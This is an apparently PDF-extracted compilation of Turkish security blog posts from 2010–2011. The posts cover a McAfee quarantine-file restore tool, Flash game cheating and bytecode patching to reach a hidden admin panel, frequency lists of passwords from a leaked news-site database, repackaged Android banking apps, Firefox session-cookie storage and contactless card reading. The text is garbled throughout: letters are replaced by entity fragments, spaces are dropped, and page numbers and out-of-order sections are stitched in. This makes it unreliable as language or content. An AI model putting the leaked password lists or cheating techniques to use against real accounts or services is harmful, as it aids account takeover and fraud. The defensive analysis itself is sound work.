Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 8: Hack 4 Career - 2011

8

9

Son olarak zararlı yazılım uumlzerinde yer alan zaman damgasına baktığımda ise SDBOT varyantının hemen hemen herguumln guumlncellenipderlendiği sonucu ortaya ccedilıkıyordu

Goumlruumllduumlğuuml uumlzere bellek analizi ile zararlı yazılımlar dinamik analiz kadar olmasa da rahatlıkla analiz edilebilir ve yeterli bir eldeedilebilinir Oumlzellikle bu yazıda değinmediğim diğer Volatility komutlarına (malfind gdt apihooks idt vb) goumlz atacak olursanız bellekanalizi ile rootkit yazılımlarını dahi tespit etmeniz muumlmkuumln olabilir

Bir sonraki yazıda goumlruumlşmek dileğiyle yeni yılın herkese sağlık mutluluk ve bol kazanccedil getirmesini dilerim

Firefox Oturum Geri Yuumlkleme OumlzelliğiSource httpswwwmertsaricacomfirefox-oturum-geri-yukleme-ozelligi

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

